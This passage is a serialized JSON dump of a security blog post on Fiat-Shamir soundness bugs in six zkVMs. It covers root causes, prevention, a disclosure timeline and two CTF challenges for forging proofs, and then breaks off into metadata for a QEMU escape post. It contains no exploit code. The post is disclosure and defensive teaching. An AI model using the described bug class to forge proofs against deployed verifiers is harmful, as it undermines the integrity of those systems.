9,"children":129200},{},[],{"type":24,"tag":301,"props":129202,"children":129204},{"className":129203},[28508],[129205],{"type":30,"value":9961},{"type":24,"tag":301,"props":129207,"children":129209},{"className":129208,"style":10915},[10914],[],{"type":24,"tag":301,"props":129211,"children":129213},{"className":129212},[10920],[129214],{"type":30,"value":118002},{"type":24,"tag":301,"props":129216,"children":129218},{"className":129217,"style":10915},[10914],[],{"type":24,"tag":301,"props":129220,"children":129222},{"className":129221},[10824],[129223,129227,129236,129241,129246,129251,129255,129265,129270,129279,129284,129293],{"type":24,"tag":301,"props":129224,"children":129226},{"className":129225,"style":99687},[10829],[],{"type":24,"tag":301,"props":129228,"children":129230},{"className":129229},[10835,30],[129231],{"type":24,"tag":301,"props":129232,"children":129234},{"className":129233},[10835],[129235],{"type":30,"value":119329},{"type":24,"tag":301,"props":129237,"children":129239},{"className":129238},[28486],[129240],{"type":30,"value":362},{"type":24,"tag":301,"props":129242,"children":129244},{"className":129243,"style":129018},[10835,28357],[129245],{"type":30,"value":2580},{"type":24,"tag":301,"props":129247,"children":129249},{"className":129248},[10946],[129250],{"type":30,"value":10949},{"type":24,"tag":301,"props":129252,"children":129254},{"className":129253,"style":10953},[10914],[],{"type":24,"tag":301,"props":129256,"children":129258},{"className":129257},[10835,30],[129259],{"type":24,"tag":301,"props":129260,"children":129262},{"className":129261},[10835],[129263],{"type":30,"value":129264},"inout",{"type":24,"tag":301,"props":129266,"children":129268},{"className":129267,"style":99745},[10835],[129269],{"type":30,"value":9918},{"type":24,"tag":301,"props":129271,"children":129273},{"className":129272},[10835,30],[129274],{"type":24,"tag":301,"props":129275,"children":129277},{"className":129276},[10835],[129278],{"type":30,"value":44287},{"type":24,"tag":301,"props":129280,"children":129282},{"className":129281,"style":99745},[10835],[129283],{"type":30,"value":9918},{"type":24,"tag":301,"props":129285,"children":129287},{"className":129286},[10835,30],[129288],{"type":24,"tag":301,"props":129289,"children":129291},{"className":129290},[10835],[129292],{"type":30,"value":124524},{"type":24,"tag":301,"props":129294,"children":129296},{"className":129295},[28508],[129297],{"type":30,"value":9961},{"type":24,"tag":32,"props":129299,"children":129300},{},[129301,129303,129308,129310,129383],{"type":30,"value":129302},"With challenges fixed (independent of ",{"type":24,"tag":145,"props":129304,"children":129306},{"className":129305},[],[129307],{"type":30,"value":68388},{"type":30,"value":129309},"), an attacker can find an alternate witness ",{"type":24,"tag":145,"props":129311,"children":129313},{"className":129312},[10807,10808],[129314],{"type":24,"tag":301,"props":129315,"children":129317},{"className":129316},[10813],[129318],{"type":24,"tag":301,"props":129319,"children":129321},{"className":129320,"ariaHidden":10819},[10818],[129322],{"type":24,"tag":301,"props":129323,"children":129325},{"className":129324},[10824],[129326,129331],{"type":24,"tag":301,"props":129327,"children":129330},{"className":129328,"style":129329},[10829],"height:1.0307em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":129332,"children":129334},{"className":129333},[10835],[129335,129344],{"type":24,"tag":301,"props":129336,"children":129338},{"className":129337},[10835,30],[129339],{"type":24,"tag":301,"props":129340,"children":129342},{"className":129341},[10835],[129343],{"type":30,"value":68388},{"type":24,"tag":301,"props":129345,"children":129347},{"className":129346},[10850],[129348],{"type":24,"tag":301,"props":129349,"children":129351},{"className":129350},[10855],[129352],{"type":24,"tag":301,"props":129353,"children":129355},{"className":129354},[10860],[129356],{"type":24,"tag":301,"props":129357,"children":129360},{"className":129358,"style":129359},[10865],"height:0.8362em;",[129361],{"type":24,"tag":301,"props":129362,"children":129364},{"style":129363},"top:-3.1473em;margin-right:0.05em;",[129365,129369],{"type":24,"tag":301,"props":129366,"children":129368},{"className":129367,"style":10875},[10874],[],{"type":24,"tag":301,"props":129370,"children":129372},{"className":129371},[10880,10881,10882,10883],[129373],{"type":24,"tag":301,"props":129374,"children":129376},{"className":129375},[10835,10883],[129377],{"type":24,"tag":301,"props":129378,"children":129380},{"className":129379},[10835,10883],[129381],{"type":30,"value":129382},"′",{"type":30,"value":129384}," that produces the same evaluation. This is a single 128-bit linear constraint over hundreds of bits, yielding a single linear equation in a high-dimensional binary witness space, which is typically underconstrained and admits many alternative witnesses under common parameterizations.",{"type":24,"tag":32,"props":129386,"children":129387},{},[129388,129392,129394],{"type":24,"tag":60,"props":129389,"children":129390},{},[129391],{"type":30,"value":123449},{"type":30,"value":129393}," Fixed on December 29, 2025 via ",{"type":24,"tag":188,"props":129395,"children":129398},{"href":129396,"rel":129397},"https://github.com/binius-zk/binius64/pull/1355/commits/86a515f0632d2acdf547ed82780dfe7f9f39358f",[192],[129399],{"type":30,"value":129400},"commit 86a515f",{"type":24,"tag":2719,"props":129402,"children":129403},{},[],{"type":24,"tag":43,"props":129405,"children":129407},{"id":129406},"why-does-this-keep-happening",[129408],{"type":30,"value":129409},"Why Does This Keep Happening?",{"type":24,"tag":32,"props":129411,"children":129412},{},[129413],{"type":30,"value":129414},"Given that we found the same bug class in six independent implementations, at some point we have to ask whether there is a systemic issue making this mistake so common.",{"type":24,"tag":80,"props":129416,"children":129418},{"id":129417},"academic-papers-dont-specify-fiat-shamir",[129419],{"type":30,"value":129420},"Academic Papers Don't Specify Fiat-Shamir",{"type":24,"tag":32,"props":129422,"children":129423},{},[129424,129426,129431,129433,129458,129460,129463,129465,129490,129492,129519],{"type":30,"value":129425},"Academic papers usually describe ",{"type":24,"tag":5422,"props":129427,"children":129428},{},[129429],{"type":30,"value":129430},"interactive",{"type":30,"value":129432}," protocols: \"Prover sends ",{"type":24,"tag":145,"props":129434,"children":129436},{"className":129435},[10807,10808],[129437],{"type":24,"tag":301,"props":129438,"children":129440},{"className":129439},[10813],[129441],{"type":24,"tag":301,"props":129442,"children":129444},{"className":129443,"ariaHidden":10819},[10818],[129445],{"type":24,"tag":301,"props":129446,"children":129448},{"className":129447},[10824],[129449,129453],{"type":24,"tag":301,"props":129450,"children":129452},{"className":129451,"style":28352},[10829],[],{"type":24,"tag":301,"props":129454,"children":129456},{"className":129455,"style":28889},[10835,28357],[129457],{"type":30,"value":122968},{"type":30,"value":129459},". Verifier sends",{"type":24,"tag":37724,"props":129461,"children":129462},{},[],{"type":30,"value":129464},"random ",{"type":24,"tag":145,"props":129466,"children":129468},{"className":129467},[10807,10808],[129469],{"type":24,"tag":301,"props":129470,"children":129472},{"className":129471},[10813],[129473],{"type":24,"tag":301,"props":129474,"children":129476},{"className":129475,"ariaHidden":10819},[10818],[129477],{"type":24,"tag":301,"props":129478,"children":129480},{"className":129479},[10824],[129481,129485],{"type":24,"tag":301,"props":129482,"children":129484},{"className":129483,"style":117581},[10829],[],{"type":24,"tag":301,"props":129486,"children":129488},{"className":129487,"style":99745},[10835,28357],[129489],{"type":30,"value":100563},{"type":30,"value":129491},". Prover sends ",{"type":24,"tag":145,"props":129493,"children":129495},{"className":129494},[10807,10808],[129496],{"type":24,"tag":301,"props":129497,"children":129499},{"className":129498},[10813],[129500],{"type":24,"tag":301,"props":129501,"children":129503},{"className":129502,"ariaHidden":10819},[10818],[129504],{"type":24,"tag":301,"props":129505,"children":129507},{"className":129506},[10824],[129508,129512],{"type":24,"tag":301,"props":129509,"children":129511},{"className":129510,"style":28352},[10829],[],{"type":24,"tag":301,"props":129513,"children":129516},{"className":129514,"style":129515},[10835,28357],"margin-right:0.00773em;",[129517],{"type":30,"value":129518},"R",{"type":30,"value":129520},".\"",{"type":24,"tag":32,"props":129522,"children":129523},{},[129524,129526,129551,129553,129578],{"type":30,"value":129525},"They often omit the necessary steps to make the protocol non-interactive: \"Hash ",{"type":24,"tag":145,"props":129527,"children":129529},{"className":129528},[10807,10808],[129530],{"type":24,"tag":301,"props":129531,"children":129533},{"className":129532},[10813],[129534],{"type":24,"tag":301,"props":129535,"children":129537},{"className":129536,"ariaHidden":10819},[10818],[129538],{"type":24,"tag":301,"props":129539,"children":129541},{"className":129540},[10824],[129542,129546],{"type":24,"tag":301,"props":129543,"children":129545},{"className":129544,"style":28352},[10829],[],{"type":24,"tag":301,"props":129547,"children":129549},{"className":129548,"style":28889},[10835,28357],[129550],{"type":30,"value":122968},{"type":30,"value":129552}," before sampling ",{"type":24,"tag":145,"props":129554,"children":129556},{"className":129555},[10807,10808],[129557],{"type":24,"tag":301,"props":129558,"children":129560},{"className":129559},[10813],[129561],{"type":24,"tag":301,"props":129562,"children":129564},{"className":129563,"ariaHidden":10819},[10818],[129565],{"type":24,"tag":301,"props":129566,"children":129568},{"className":129567},[10824],[129569,129573],{"type":24,"tag":301,"props":129570,"children":129572},{"className":129571,"style":117581},[10829],[],{"type":24,"tag":301,"props":129574,"children":129576},{"className":129575,"style":99745},[10835,28357],[129577],{"type":30,"value":100563},{"type":30,"value":129579},". Also hash the public statement. Also hash intermediate values that affect later equations.\"",{"type":24,"tag":32,"props":129581,"children":129582},{},[129583],{"type":30,"value":129584},"Security proofs thus also analyze the interactive protocols where binding is implicit. The responsibility of determining what to include in the transcript therefore falls on the implementor, which may not have a good understanding of the full protocol.",{"type":24,"tag":80,"props":129586,"children":129588},{"id":129587},"the-hot-potato-problem",[129589],{"type":30,"value":129590},"The Hot Potato Problem",{"type":24,"tag":32,"props":129592,"children":129593},{},[129594],{"type":30,"value":129595},"Modern zkVMs are modular:",{"type":24,"tag":32,"props":129597,"children":129598},{},[129599],{"type":24,"tag":177,"props":129600,"children":129603},{"alt":129601,"src":129602},"11_hot_potato","/posts/zkvms-unfaithful-claims/11_hot_potato.svg",[],{"type":24,"tag":32,"props":129605,"children":129606},{},[129607],{"type":30,"value":129608},"It often happens that each layer assumes the previous/next layer handles the transcript binding for a value, so in the end it never happens.",{"type":24,"tag":80,"props":129610,"children":129612},{"id":129611},"optimization-pressure",[129613],{"type":30,"value":129614},"Optimization Pressure",{"type":24,"tag":32,"props":129616,"children":129617},{},[129618],{"type":30,"value":129619},"Performance is existential for ZK. Since every hash operation has a cost, there is constant pressure to exclude values that are \"probably fine\" to leave out.",{"type":24,"tag":32,"props":129621,"children":129622},{},[129623],{"type":30,"value":129624},"There are indeed cases when this can be done safely, but determining what is safe requires a full understanding of all protocols involved, and the decision to exclude something should be double and triple checked by experts.",{"type":24,"tag":80,"props":129626,"children":129628},{"id":129627},"testing-doesnt-catch-adversarial-inputs",[129629],{"type":30,"value":129630},"Testing Doesn't Catch Adversarial Inputs",{"type":24,"tag":32,"props":129632,"children":129633},{},[129634],{"type":30,"value":129635},"Unit tests run the honest prover. Integration tests run the honest prover. Fuzzing only randomly perturbs values and has a very low probability of succeeding in fooling a verifier. Identifying Fiat-Shamir bugs requires thorough manual security analysis, and sometimes even that falls short.",{"type":24,"tag":2719,"props":129637,"children":129638},{},[],{"type":24,"tag":43,"props":129640,"children":129642},{"id":129641},"how-to-find-and-fix-these-bugs",[129643],{"type":30,"value":129644},"How to Find and Fix These Bugs",{"type":24,"tag":80,"props":129646,"children":129648},{"id":129647},"prevention",[129649],{"type":30,"value":129650},"Prevention",{"type":24,"tag":32,"props":129652,"children":129653},{},[129654],{"type":30,"value":129655},"Fiat-Shamir has long been a known source of soundness bugs, which has driven the development of primitives that make implementation less error-prone.",{"type":24,"tag":32,"props":129657,"children":129658},{},[129659],{"type":30,"value":129660},"One such tool is to merge the proof and transcript, to force all values that are sent by the prover to be automatically absorbed into the transcript.",{"type":24,"tag":32,"props":129662,"children":129663},{},[129664],{"type":30,"value":129665},"The prover holds a proof buffer which emulates the communication channel between prover and verifier. When a value is sent by the prover it is added to the proof buffer and automatically absorbed into the transcript. When the prover then needs to read a challenge from the verifier it simply squeezes from the current transcript.",{"type":24,"tag":32,"props":129667,"children":129668},{},[129669],{"type":30,"value":129670},"This can then be done in reverse for the verifier. It gradually reads values from the proof buffer and can thus sync the transcript state and derive the same challenges.",{"type":24,"tag":32,"props":129672,"children":129673},{},[129674],{"type":30,"value":129675},"Halo2 follows this pattern, and Binius is transcript-centric as well. But even with a merged proof/transcript, statement data (e.g., public inputs) must still be absorbed before sampling any challenges that govern equations depending on them—and as Binius demonstrates, even transcript-centric systems can miss this.",{"type":24,"tag":2719,"props":129677,"children":129678},{},[],{"type":24,"tag":43,"props":129680,"children":129682},{"id":129681},"responsible-disclosure-timeline",[129683],{"type":30,"value":129684},"Responsible Disclosure Timeline",{"type":24,"tag":62466,"props":129686,"children":129687},{},[129688,129716],{"type":24,"tag":129689,"props":129690,"children":129691},"thead",{},[129692],{"type":24,"tag":129693,"props":129694,"children":129695},"tr",{},[129696,129701,129706,129711],{"type":24,"tag":129697,"props":129698,"children":129699},"th",{},[129700],{"type":30,"value":29975},{"type":24,"tag":129697,"props":129702,"children":129703},{},[129704],{"type":30,"value":129705},"Reported",{"type":24,"tag":129697,"props":129707,"children":129708},{},[129709],{"type":30,"value":129710},"Fixed",{"type":24,"tag":129697,"props":129712,"children":129713},{},[129714],{"type":30,"value":129715},"Response Time",{"type":24,"tag":129717,"props":129718,"children":129719},"tbody",{},[129720,129743,129764,129784,129806,129827],{"type":24,"tag":129693,"props":129721,"children":129722},{},[129723,129728,129733,129738],{"type":24,"tag":129724,"props":129725,"children":129726},"td",{},[129727],{"type":30,"value":114554},{"type":24,"tag":129724,"props":129729,"children":129730},{},[129731],{"type":30,"value":129732},"Sep 2025",{"type":24,"tag":129724,"props":129734,"children":129735},{},[129736],{"type":30,"value":129737},"Oct 3, 2025",{"type":24,"tag":129724,"props":129739,"children":129740},{},[129741],{"type":30,"value":129742},"\u003C1 week",{"type":24,"tag":129693,"props":129744,"children":129745},{},[129746,129750,129755,129760],{"type":24,"tag":129724,"props":129747,"children":129748},{},[129749],{"type":30,"value":114560},{"type":24,"tag":129724,"props":129751,"children":129752},{},[129753],{"type":30,"value":129754},"Oct 2025",{"type":24,"tag":129724,"props":129756,"children":129757},{},[129758],{"type":30,"value":129759},"Oct 24, 2025",{"type":24,"tag":129724,"props":129761,"children":129762},{},[129763],{"type":30,"value":129742},{"type":24,"tag":129693,"props":129765,"children":129766},{},[129767,129771,129775,129780],{"type":24,"tag":129724,"props":129768,"children":129769},{},[129770],{"type":30,"value":114566},{"type":24,"tag":129724,"props":129772,"children":129773},{},[129774],{"type":30,"value":129754},{"type":24,"tag":129724,"props":129776,"children":129777},{},[129778],{"type":30,"value":129779},"Oct 31, 2025",{"type":24,"tag":129724,"props":129781,"children":129782},{},[129783],{"type":30,"value":129742},{"type":24,"tag":129693,"props":129785,"children":129786},{},[129787,129791,129796,129801],{"type":24,"tag":129724,"props":129788,"children":129789},{},[129790],{"type":30,"value":114572},{"type":24,"tag":129724,"props":129792,"children":129793},{},[129794],{"type":30,"value":129795},"Nov 2025",{"type":24,"tag":129724,"props":129797,"children":129798},{},[129799],{"type":30,"value":129800},"Mar 5, 2026",{"type":24,"tag":129724,"props":129802,"children":129803},{},[129804],{"type":30,"value":129805},"~4 months",{"type":24,"tag":129693,"props":129807,"children":129808},{},[129809,129813,129818,129823],{"type":24,"tag":129724,"props":129810,"children":129811},{},[129812],{"type":30,"value":114584},{"type":24,"tag":129724,"props":129814,"children":129815},{},[129816],{"type":30,"value":129817},"Dec 2025",{"type":24,"tag":129724,"props":129819,"children":129820},{},[129821],{"type":30,"value":129822},"Dec 29, 2025",{"type":24,"tag":129724,"props":129824,"children":129825},{},[129826],{"type":30,"value":129742},{"type":24,"tag":129693,"props":129828,"children":129829},{},[129830,129834,129838,129843],{"type":24,"tag":129724,"props":129831,"children":129832},{},[129833],{"type":30,"value":114578},{"type":24,"tag":129724,"props":129835,"children":129836},{},[129837],{"type":30,"value":129795},{"type":24,"tag":129724,"props":129839,"children":129840},{},[129841],{"type":30,"value":129842},"Jan 21, 2026?",{"type":24,"tag":129724,"props":129844,"children":129845},{},[129846],{"type":30,"value":129847},"3 months",{"type":24,"tag":32,"props":129849,"children":129850},{},[129851],{"type":30,"value":129852},"All six teams were notified; responses ranged from immediate acknowledgement to delayed fix, and all reported issues have since been addressed.",{"type":24,"tag":2719,"props":129854,"children":129855},{},[],{"type":24,"tag":43,"props":129857,"children":129859},{"id":129858},"challenges",[129860],{"type":30,"value":114597},{"type":24,"tag":32,"props":129862,"children":129863},{},[129864,129866],{"type":30,"value":129865},"Do you think you have a good understanding of these bugs? We have prepared challenges to allow you to practice implementing two of these exploits. If you solve any of them, follow the instructions in the flag ",{"type":24,"tag":129867,"props":129868,"children":129869},"del",{},[129870],{"type":30,"value":129871},"the first 10 solvers will get a T-shirt.",{"type":24,"tag":32,"props":129873,"children":129874},{},[129875,129877,129930,129931,130187],{"type":30,"value":129876},"Your goal is to find a counter example of Fermat's Last Theorem, i.e you know ",{"type":24,"tag":145,"props":129878,"children":129880},{"className":129879},[10807,10808],[129881],{"type":24,"tag":301,"props":129882,"children":129884},{"className":129883},[10813],[129885],{"type":24,"tag":301,"props":129886,"children":129888},{"className":129887,"ariaHidden":10819},[10818],[129889],{"type":24,"tag":301,"props":129890,"children":129892},{"className":129891},[10824],[129893,129897,129902,129907,129911,129916,129921,129925],{"type":24,"tag":301,"props":129894,"children":129896},{"className":129895,"style":121794},[10829],[],{"type":24,"tag":301,"props":129898,"children":129900},{"className":129899},[10835,28357],[129901],{"type":30,"value":188},{"type":24,"tag":301,"props":129903,"children":129905},{"className":129904},[10946],[129906],{"type":30,"value":10949},{"type":24,"tag":301,"props":129908,"children":129910},{"className":129909,"style":10953},[10914],[],{"type":24,"tag":301,"props":129912,"children":129914},{"className":129913},[10835,28357],[129915],{"type":30,"value":5613},{"type":24,"tag":301,"props":129917,"children":129919},{"className":129918},[10946],[129920],{"type":30,"value":10949},{"type":24,"tag":301,"props":129922,"children":129924},{"className":129923,"style":10953},[10914],[],{"type":24,"tag":301,"props":129926,"children":129928},{"className":129927},[10835,28357],[129929],{"type":30,"value":294},{"type":30,"value":116396},{"type":24,"tag":145,"props":129932,"children":129934},{"className":129933},[10807,10808],[129935],{"type":24,"tag":301,"props":129936,"children":129938},{"className":129937},[10813],[129939],{"type":24,"tag":301,"props":129940,"children":129942},{"className":129941,"ariaHidden":10819},[10818],[129943,130006,130068,130174],{"type":24,"tag":301,"props":129944,"children":129946},{"className":129945},[10824],[129947,129952,129993,129997,130002],{"type":24,"tag":301,"props":129948,"children":129951},{"className":129949,"style":129950},[10829],"height:0.8974em;vertical-align:-0.0833em;",[],{"type":24,"tag":301,"props":129953,"children":129955},{"className":129954},[10835],[129956,129961],{"type":24,"tag":301,"props":129957,"children":129959},{"className":129958},[10835,28357],[129960],{"type":30,"value":188},{"type":24,"tag":301,"props":129962,"children":129964},{"className":129963},[10850],[129965],{"type":24,"tag":301,"props":129966,"children":129968},{"className":129967},[10855],[129969],{"type":24,"tag":301,"props":129970,"children":129972},{"className":129971},[10860],[129973],{"type":24,"tag":301,"props":129974,"children":129976},{"className":129975,"style":10830},[10865],[129977],{"type":24,"tag":301,"props":129978,"children":129979},{"style":10869},[129980,129984],{"type":24,"tag":301,"props":129981,"children":129983},{"className":129982,"style":10875},[10874],[],{"type":24,"tag":301,"props":129985,"children":129987},{"className":129986},[10880,10881,10882,10883],[129988],{"type":24,"tag":301,"props":129989,"children":129991},{"className":129990},[10835,10883],[129992],{"type":30,"value":1447},{"type":24,"tag":301,"props":129994,"children":129996},{"className":129995,"style":10915},[10914],[],{"type":24,"tag":301,"props":129998,"children":130000},{"className":129999},[10920],[130001],{"type":30,"value":11206},{"type":24,"tag":301,"props":130003,"children":130005},{"className":130004,"style":10915},[10914],[],{"type":24,"tag":301,"props":130007,"children":130009},{"className":130008},[10824],[130010,130014,130055,130059,130064],{"type":24,"tag":301,"props":130011,"children":130013},{"className":130012,"style":10830},[10829],[],{"type":24,"tag":301,"props":130015,"children":130017},{"className":130016},[10835],[130018,130023],{"type":24,"tag":301,"props":130019,"children":130021},{"className":130020},[10835,28357],[130022],{"type":30,"value":5613},{"type":24,"tag":301,"props":130024,"children":130026},{"className":130025},[10850],[130027],{"type":24,"tag":301,"props":130028,"children":130030},{"className":130029},[10855],[130031],{"type":24,"tag":301,"props":130032,"children":130034},{"className":130033},[10860],[130035],{"type":24,"tag":301,"props":130036,"children":130038},{"className":130037,"style":10830},[10865],[130039],{"type":24,"tag":301,"props":130040,"children":130041},{"style":10869},[130042,130046],{"type":24,"tag":301,"props":130043,"children":130045},{"className":130044,"style":10875},[10874],[],{"type":24,"tag":301,"props":130047,"children":130049},{"className":130048},[10880,10881,10882,10883],[130050],{"type":24,"tag":301,"props":130051,"children":130053},{"className":130052},[10835,10883],[130054],{"type":30,"value":1447},{"type":24,"tag":301,"props":130056,"children":130058},{"className":130057,"style":11012},[10914],[],{"type":24,"tag":301,"props":130060,"children":130062},{"className":130061},[11017],[130063],{"type":30,"value":523},{"type":24,"tag":301,"props":130065,"children":130067},{"className":130066,"style":11012},[10914],[],{"type":24,"tag":301,"props":130069,"children":130071},{"className":130070},[10824],[130072,130077,130118,130123,130127,130132,130137,130141,130146,130151,130155,130160,130164,130170],{"type":24,"tag":301,"props":130073,"children":130076},{"className":130074,"style":130075},[10829],"height:1.0085em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":130078,"children":130080},{"className":130079},[10835],[130081,130086],{"type":24,"tag":301,"props":130082,"children":130084},{"className":130083},[10835,28357],[130085],{"type":30,"value":294},{"type":24,"tag":301,"props":130087,"children":130089},{"className":130088},[10850],[130090],{"type":24,"tag":301,"props":130091,"children":130093},{"className":130092},[10855],[130094],{"type":24,"tag":301,"props":130095,"children":130097},{"className":130096},[10860],[130098],{"type":24,"tag":301,"props":130099,"children":130101},{"className":130100,"style":10830},[10865],[130102],{"type":24,"tag":301,"props":130103,"children":130104},{"style":10869},[130105,130109],{"type":24,"tag":301,"props":130106,"children":130108},{"className":130107,"style":10875},[10874],[],{"type":24,"tag":301,"props":130110,"children":130112},{"className":130111},[10880,10881,10882,10883],[130113],{"type":24,"tag":301,"props":130114,"children":130116},{"className":130115},[10835,10883],[130117],{"type":30,"value":1447},{"type":24,"tag":301,"props":130119,"children":130121},{"className":130120},[10946],[130122],{"type":30,"value":10949},{"type":24,"tag":301,"props":130124,"children":130126},{"className":130125,"style":10953},[10914],[],{"type":24,"tag":301,"props":130128,"children":130130},{"className":130129},[10835,28357],[130131],{"type":30,"value":188},{"type":24,"tag":301,"props":130133,"children":130135},{"className":130134},[10946],[130136],{"type":30,"value":10949},{"type":24,"tag":301,"props":130138,"children":130140},{"className":130139,"style":10953},[10914],[],{"type":24,"tag":301,"props":130142,"children":130144},{"className":130143},[10835,28357],[130145],{"type":30,"value":5613},{"type":24,"tag":301,"props":130147,"children":130149},{"className":130148},[10946],[130150],{"type":30,"value":10949},{"type":24,"tag":301,"props":130152,"children":130154},{"className":130153,"style":10953},[10914],[],{"type":24,"tag":301,"props":130156,"children":130158},{"className":130157},[10835,28357],[130159],{"type":30,"value":294},{"type":24,"tag":301,"props":130161,"children":130163},{"className":130162,"style":11012},[10914],[],{"type":24,"tag":301,"props":130165,"children":130167},{"className":130166},[11017],[130168],{"type":30,"value":130169},"≥",{"type":24,"tag":301,"props":130171,"children":130173},{"className":130172,"style":11012},[10914],[],{"type":24,"tag":301,"props":130175,"children":130177},{"className":130176},[10824],[130178,130182],{"type":24,"tag":301,"props":130179,"children":130181},{"className":130180,"style":100775},[10829],[],{"type":24,"tag":301,"props":130183,"children":130185},{"className":130184},[10835],[130186],{"type":30,"value":546},{"type":30,"value":130188},". Good luck!",{"type":24,"tag":80,"props":130190,"children":130192},{"id":130191},"jolt",[130193],{"type":30,"value":114554},{"type":24,"tag":32,"props":130195,"children":130196},{},[130197,130199,130210,130212],{"type":30,"value":130198},"See ",{"type":24,"tag":188,"props":130200,"children":130207},{"href":130201,"target":130202,"rel":130203,"download":130206},"/posts/zkvms-unfaithful-claims/handout_jolt.tar.gz","_blank",[130204,130205],"noopener","noreferrer","handout_jolt.tar.gz",[130208],{"type":30,"value":130209},"the handout",{"type":30,"value":130211}," for the setup running on the server.\nSubmit your proof by connecting to ",{"type":24,"tag":145,"props":130213,"children":130215},{"className":130214},[],[130216],{"type":30,"value":130217},"jolt.chal.osec.io:8960",{"type":24,"tag":80,"props":130219,"children":130221},{"id":130220},"nexus-1",[130222],{"type":30,"value":114560},{"type":24,"tag":32,"props":130224,"children":130225},{},[130226,130227,130234,130235],{"type":30,"value":130198},{"type":24,"tag":188,"props":130228,"children":130232},{"href":130229,"target":130202,"rel":130230,"download":130231},"/posts/zkvms-unfaithful-claims/handout_nexus.tar.gz",[130204,130205],"handout_nexus.tar.gz",[130233],{"type":30,"value":130209},{"type":30,"value":130211},{"type":24,"tag":145,"props":130236,"children":130238},{"className":130237},[],[130239],{"type":30,"value":130240},"nexus.chal.osec.io:8950",{"type":24,"tag":32,"props":130242,"children":130243},{},[130244],{"type":30,"value":130245},"Now you should have enough margin to prove Fermat wrong.",{"type":24,"tag":2719,"props":130247,"children":130248},{},[],{"type":24,"tag":43,"props":130250,"children":130252},{"id":130251},"takeaways",[130253],{"type":30,"value":130254},"Takeaways",{"type":24,"tag":32,"props":130256,"children":130257},{},[130258],{"type":30,"value":130259},"We found critical soundness vulnerabilities in six separate zkVMs. All share the same root cause: prover-controlled values that affect verification equations were not bound to the Fiat-Shamir transcript before challenges were derived.",{"type":24,"tag":32,"props":130261,"children":130262},{},[130263],{"type":30,"value":130264},"The fix in each case is trivial—one or two lines of code. But finding the bug requires understanding the full verification flow and asking: \"What if the prover chose this value after seeing the challenges?\"",{"type":24,"tag":32,"props":130266,"children":130267},{},[130268,130273],{"type":24,"tag":60,"props":130269,"children":130270},{},[130271],{"type":30,"value":130272},"For the ZK ecosystem:",{"type":30,"value":130274}," The Fiat-Shamir transform looks simple. Hash everything, derive challenges. In practice, \"everything\" is hard to specify when you have dozens of components, each with its own inputs and outputs, each expecting someone else to handle binding.",{"type":24,"tag":32,"props":130276,"children":130277},{},[130278],{"type":30,"value":130279},"We found six instances by examining a handful of systems. How many more exist in the dozens of zkVMs, proof systems, and recursive verifiers deployed today?",{"type":24,"tag":32,"props":130281,"children":130282},{},[130283,130288],{"type":24,"tag":60,"props":130284,"children":130285},{},[130286],{"type":30,"value":130287},"For auditors:",{"type":30,"value":130289}," Draw the data flow. Trace the transcript. Check every prover-controlled value against when its relevant challenges are derived.",{"type":24,"tag":32,"props":130291,"children":130292},{},[130293,130298],{"type":24,"tag":60,"props":130294,"children":130295},{},[130296],{"type":30,"value":130297},"For builders:",{"type":30,"value":130299}," Treat the transcript as a sacred ledger. When in doubt, absorb it.",{"type":24,"tag":9672,"props":130301,"children":130302},{},[130303],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":130305},[130306,130307,130310,130316,130317,130325,130331,130334,130335,130339],{"id":114605,"depth":320,"text":114608},{"id":114747,"depth":320,"text":114750,"children":130308},[130309],{"id":114753,"depth":335,"text":114756},{"id":115182,"depth":320,"text":115185,"children":130311},[130312,130313,130314,130315],{"id":115193,"depth":335,"text":115196},{"id":115381,"depth":335,"text":115384},{"id":118761,"depth":335,"text":118764},{"id":119975,"depth":335,"text":119978},{"id":121611,"depth":320,"text":121614},{"id":122117,"depth":320,"text":122120,"children":130318},[130319,130320,130321,130322,130323,130324],{"id":122139,"depth":335,"text":122142},{"id":123464,"depth":335,"text":114560},{"id":124600,"depth":335,"text":124603},{"id":125268,"depth":335,"text":125271},{"id":127923,"depth":335,"text":127926},{"id":128477,"depth":335,"text":114584},{"id":129406,"depth":320,"text":129409,"children":130326},[130327,130328,130329,130330],{"id":129417,"depth":335,"text":129420},{"id":129587,"depth":335,"text":129590},{"id":129611,"depth":335,"text":129614},{"id":129627,"depth":335,"text":129630},{"id":129641,"depth":320,"text":129644,"children":130332},[130333],{"id":129647,"depth":335,"text":129650},{"id":129681,"depth":320,"text":129684},{"id":129858,"depth":320,"text":114597,"children":130336},[130337,130338],{"id":130191,"depth":335,"text":114554},{"id":130220,"depth":335,"text":114560},{"id":130251,"depth":320,"text":130254},"content:blog:2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims.md","blog/2026-03-03-zkvms-unfaithful-claims",{"_path":130344,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":130345,"description":130346,"date":130347,"author":11,"image":130348,"isFeatured":16,"onBlogPage":16,"tags":130350,"body":130353,"_type":9700,"_id":138624,"_source":9702,"_file":138625,"_stem":138626,"_extension":9705},"/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape","From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow","Turning an uncontrolled heap overflow into a reliable QEMU guest-to-host escape using new glibc allocator behavior and QEMU-specific heap spray techniques.","2026-03-17T12:00:00.000Z",{"src":130349,"width":14,"height":15},"/posts/virtio-snd-qemu-0day/title.png",[130351,130352],"qemu","heap-overflow",{"type":21,"children":130354,"toc":138606},[130355,130360,130365,130370,130376,130381,130386,130394,130400,130412,130416,130421,130429,130434,130440,130445,130458,131066,131101,131146,131180,131215,131349,131397,131403,131408,132163,132207,132243,132278,132343,132363,132813,132860,132863,132868,132933,132959,132981,132985,132990,132995,133001,133006,133011,133016,133022,133035,133041,133046,133054,133123,133128,133134,133146,133372,133435,133454,133837,133842,133875,133880,134155,134167,134185,134463,134475,134478,134512,134517,134523,134535,134547,134552,134557,134567,134602,135219,135251,135262,135298,135311,135317,135329,135337,135363,135368,135401,135442,135448,135467,135505,135513,135562,135567,135615,135620,135628,135715,135721,135760,135772,135780,135798,135817,135825,135837,135845,135864,135872,135883,135891,135902,135910,135923,135931,135937,135942,135955,135963,135981,135989,136001,136006,136014,136050,136083,136090,136124,136132,136137,136143,136155,136166,136445,136505,136572,136580,136614,137218,137229,137237,137243,137248,137259,138013,138046,138058,138144,138164,138373,138420,138431,138437,138456,138482,138510,138526,138551,138554,138574,138588,138592,138597,138602],{"type":24,"tag":32,"props":13